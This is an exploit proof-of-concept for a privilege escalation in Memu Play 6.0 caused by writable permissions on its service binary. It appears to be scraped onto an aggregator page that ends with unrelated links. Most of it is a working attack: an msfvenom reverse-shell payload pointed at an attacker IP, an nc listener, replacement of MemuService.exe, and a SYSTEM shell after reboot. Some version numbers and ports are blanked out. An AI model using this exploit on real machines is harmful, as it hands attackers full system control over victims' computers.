# Exploit Title: Memu Play 6.0. - Privilege Escalation (PoC)
# Date: //
# Author: Alejandra Sánchez
# Vendor Homepage: https://www.memuplay.com/
# Software Link: https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Version: 6.0.
# Tested on: Windows / Windows # Description:
# Memu Play 6.0. suffers from Privilege Escalation due to insecure file permissions # Prerequisites
# Local, Low privilege access with restart capabilities # Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file. C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F) Successfully processed files; Failed processing files C:\>sc qc MEmuSVC
[SC] QueryServiceConfig SUCCESS SERVICE_NAME: MEmuSVC
TYPE : WIN32_OWN_PROCESS
START_TYPE : AUTO_START
ERROR_CONTROL : NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe
LOAD_ORDER_GROUP :
TAG : # Proof of Concept . Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT= -f exe > /var/www/html/MemuService.exe . Setup listener and ensure apache is running on attacking machine
nc -lvp
service apache2 start . Download malicious .exe on victim machine
Open browser to http://192.168.1.130/MemuService.exe and download . Overwrite file and copy malicious .exe.
Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\ . Restart victim machine . Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

[EXP]Memu Play 6.0.7 - Privilege Escalation的更多相关文章

  1. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  2. karottc A Simple linux-virus Analysis、Linux Kernel <= 2.6.37 - Local Privilege Escalation、CVE-2010-4258、CVE-2010-3849、CVE-2010-3850

    catalog . 程序功能概述 . 感染文件 . 前置知识 . 获取ROOT权限: Linux Kernel <= - Local Privilege Escalation 1. 程序功能概述 ...

  3. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  4. FreeBSD Intel SYSRET Kernel Privilege Escalation Exploit

    /* * FreeBSD 9.0 Intel SYSRET Kernel Privilege Escalation exploit * Author by CurcolHekerLink * * Th ...

  5. Basic Linux Privilege Escalation

    (Linux) privilege escalation is all about: Collect - Enumeration, more enumeration and some more enu ...

  6. CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC

    /**  * CVE-2014-4014 Linux Kernel Local Privilege Escalation PoC  *  * Vitaly Nikolenko  * http://ha ...

  7. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  8. Android linux kernel privilege escalation vulnerability and exploit (CVE-2014-4322)

    In this blog post we'll go over a Linux kernel privilege escalation vulnerability I discovered which ...

  9. [EXP]Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation

    Windows: XmlDocument Insecure Sharing Elevation of Privilege Platform: Windows (almost certainly ear ...

随机推荐

  1. HDU-1078.FatMouseandCheese(线性dp + dfs)

    本题大意:在一个n * n的迷宫内进行移动,左上角为初始位置,每次可以走的步数不能超过m,并且每次走的方格上面的数字要大于前一次走的放个数字,不能走到格子外面,问如何能使得到的数字和最大. 本题思路: ...

  2. PHP Laravel定时任务Schedule

    前提:本文方法是利用Linux的crontab定时任务来协助实现Laravel调度(Mac也一样). 一.首先添加Crontab定时任务,这里只做简单介绍. 用命令crontab -e 添加如下内容 ...

  3. 存储过程传入datatable

    存储过程传入一般的参数都很简单,今天要说一下存储过程传入datatable 类型 首先要自定义一个 表类型 CREATE TYPE [dbo].[servicedatableType] AS TABL ...

  4. Python项目--Scrapy框架(二)

    本文主要是利用scrapy框架爬取果壳问答中热门问答, 精彩问答的相关信息 环境 win8, python3.7, pycharm 正文 1. 创建scrapy项目文件 在cmd命令行中任意目录下执行 ...

  5. 在IDEA中使用MyBatis Generator自动生成代码

    转载自 https://blog.csdn.net/hua_faded/article/details/78900780 一.配置Maven pom.xml 文件 在pom.xml增加以下插件:   ...

  6. idea环境配置

    Idea 下载 https://www.jetbrains.com/idea/download/#section=windows idea安装(略) idea破解 window配置hosts文件:0. ...

  7. 深入理解JVM(四)JVM性能监控与故障处理工具

    4.2 JVM命令行工具 1.jps(JVM Process Status Tool):JVM进程查看工具,命令行进入到jdk的bin目录下,使用命令:jps -l/-q/-v/-m 2.jstat( ...

  8. 在cmd下可以import cv2,而Pycharm报错:找不到cv2

    平台:win10 x64+Pycharm+Anaconda3+opencv 安装教程:参考博客——http://blog.sina.com.cn/s/blog_cca23c300102xiy4.htm ...

  9. Windows激活客户端 已停止工作

    win+r 进入运行 slmgr /ipx 新的sn slmgr /ato

  10. 单片机之PID算法

    说到PID算法,想必大部人并不陌生,PID算法在很多方面都有重要应用,比如电机的速度控制,恒温槽的温度控制,四轴飞行器的平衡控制等等,作为闭环控制系统中的一种重要算法,其优点和可实现性都成为人们的首选 ...